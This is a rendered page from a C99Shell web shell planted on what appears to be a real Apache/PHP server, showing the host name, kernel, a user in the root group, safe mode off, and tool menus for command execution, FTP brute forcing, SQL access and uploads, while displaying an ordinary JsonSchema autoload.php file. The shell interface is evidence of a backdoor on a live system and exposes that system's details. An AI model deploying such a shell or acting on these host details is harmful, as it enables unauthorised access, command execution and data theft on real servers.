!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/php/JsonSchema/   drwxr-xr-x
Free 24.93 GB of 117.98 GB (21.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     autoload.php (4.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// @codingStandardsIgnoreFile
// @codeCoverageIgnoreStart
// this is an autogenerated file - do not edit
spl_autoload_register(
    function(
$class) {
        static 
$classes null;
        if (
$classes === null) {
            
$classes = array(
                
'jsonschema\\constraints\\baseconstraint' => '/Constraints/BaseConstraint.php',
                
'jsonschema\\constraints\\collectionconstraint' => '/Constraints/CollectionConstraint.php',
                
'jsonschema\\constraints\\constraint' => '/Constraints/Constraint.php',
                
'jsonschema\\constraints\\constraintinterface' => '/Constraints/ConstraintInterface.php',
                
'jsonschema\\constraints\\enumconstraint' => '/Constraints/EnumConstraint.php',
                
'jsonschema\\constraints\\factory' => '/Constraints/Factory.php',
                
'jsonschema\\constraints\\formatconstraint' => '/Constraints/FormatConstraint.php',
                
'jsonschema\\constraints\\numberconstraint' => '/Constraints/NumberConstraint.php',
                
'jsonschema\\constraints\\objectconstraint' => '/Constraints/ObjectConstraint.php',
                
'jsonschema\\constraints\\schemaconstraint' => '/Constraints/SchemaConstraint.php',
                
'jsonschema\\constraints\\stringconstraint' => '/Constraints/StringConstraint.php',
                
'jsonschema\\constraints\\typecheck\\loosetypecheck' => '/Constraints/TypeCheck/LooseTypeCheck.php',
                
'jsonschema\\constraints\\typecheck\\stricttypecheck' => '/Constraints/TypeCheck/StrictTypeCheck.php',
                
'jsonschema\\constraints\\typecheck\\typecheckinterface' => '/Constraints/TypeCheck/TypeCheckInterface.php',
                
'jsonschema\\constraints\\typeconstraint' => '/Constraints/TypeConstraint.php',
                
'jsonschema\\constraints\\undefinedconstraint' => '/Constraints/UndefinedConstraint.php',
                
'jsonschema\\entity\\jsonpointer' => '/Entity/JsonPointer.php',
                
'jsonschema\\exception\\exceptioninterface' => '/Exception/ExceptionInterface.php',
                
'jsonschema\\exception\\invalidargumentexception' => '/Exception/InvalidArgumentException.php',
                
'jsonschema\\exception\\invalidconfigexception' => '/Exception/InvalidConfigException.php',
                
'jsonschema\\exception\\invalidschemaexception' => '/Exception/InvalidSchemaException.php',
                
'jsonschema\\exception\\invalidschemamediatypeexception' => '/Exception/InvalidSchemaMediaTypeException.php',
                
'jsonschema\\exception\\invalidsourceuriexception' => '/Exception/InvalidSourceUriException.php',
                
'jsonschema\\exception\\jsondecodingexception' => '/Exception/JsonDecodingException.php',
                
'jsonschema\\exception\\resourcenotfoundexception' => '/Exception/ResourceNotFoundException.php',
                
'jsonschema\\exception\\runtimeexception' => '/Exception/RuntimeException.php',
                
'jsonschema\\exception\\unresolvablejsonpointerexception' => '/Exception/UnresolvableJsonPointerException.php',
                
'jsonschema\\exception\\uriresolverexception' => '/Exception/UriResolverException.php',
                
'jsonschema\\exception\\validationexception' => '/Exception/ValidationException.php',
                
'jsonschema\\iterator\\objectiterator' => '/Iterator/ObjectIterator.php',
                
'jsonschema\\rfc3339' => '/Rfc3339.php',
                
'jsonschema\\schemastorage' => '/SchemaStorage.php',
                
'jsonschema\\schemastorageinterface' => '/SchemaStorageInterface.php',
                
'jsonschema\\uri\\retrievers\\abstractretriever' => '/Uri/Retrievers/AbstractRetriever.php',
                
'jsonschema\\uri\\retrievers\\curl' => '/Uri/Retrievers/Curl.php',
                
'jsonschema\\uri\\retrievers\\filegetcontents' => '/Uri/Retrievers/FileGetContents.php',
                
'jsonschema\\uri\\retrievers\\predefinedarray' => '/Uri/Retrievers/PredefinedArray.php',
                
'jsonschema\\uri\\retrievers\\uriretrieverinterface' => '/Uri/Retrievers/UriRetrieverInterface.php',
                
'jsonschema\\uri\\uriresolver' => '/Uri/UriResolver.php',
                
'jsonschema\\uri\\uriretriever' => '/Uri/UriRetriever.php',
                
'jsonschema\\uriresolverinterface' => '/UriResolverInterface.php',
                
'jsonschema\\uriretrieverinterface' => '/UriRetrieverInterface.php',
                
'jsonschema\\validator' => '/Validator.php'
            
);
        }
        
$cn strtolower($class);
        if (isset(
$classes[$cn])) {
            require 
__DIR__ $classes[$cn];
        }
    },
    
true,
    
false
);
// @codeCoverageIgnoreEnd

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--